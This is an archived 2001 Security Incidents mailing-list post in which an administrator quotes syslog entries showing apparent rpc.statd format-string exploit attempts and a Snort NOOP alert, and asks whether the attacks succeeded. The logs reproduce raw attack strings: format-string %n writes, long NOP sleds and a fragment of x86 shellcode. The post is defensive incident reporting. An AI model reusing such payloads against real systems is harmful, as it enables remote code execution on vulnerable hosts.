Security Incidents mailing list archives
rpc.statd exploit attempts?
From: remco () rc6 org (Remco B. Brink)
Date: 27 Jun 2001 11:56:25 +0200
Hi, during the last couple of days I've been recieving what I expect are rpc.statd exploit attempts. I'm not entirely sure however as to what degree these attacks are successful or false alerts and am hoping that people here might be able to shed some more light on this. Syslog shows me the same following message, sometimes several in a row: Jun 26 16:48:11 grolsch rpc.statd[382]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 I also quite frequently see the following message fly by: Jun 26 20:38:40 grolsch SERVER[14529]: Dispatch_input: bad request line 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2201Û1É1À°FÍ\200\211å1Ò²f\211Ð1É\211ËC\211]øC\211]ôK\211Mü\215MôÍ\2001É\211 According to Snort this last message is an "EXPLOIT x86 NOOP", which all originate from the same IP address (which is not local to my network, nor is it familiar). Is this also rpc.statd related? Were the attacks succesful? Where should I go from here? regards, Remco -- Remco B. Brink - SOL Børs A/S systemsdeveloper - http://www.norge-invest.no Personal site at http://rc6.org - PGP/GnuPG key at http://rc6.org/rbb.pgp panic("Lucy in the sky...."); 2.2.16 /usr/src/linux/arch/sparc64/kernel/starfire.c ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- rpc.statd exploit attempts? Remco B. Brink (Jun 27)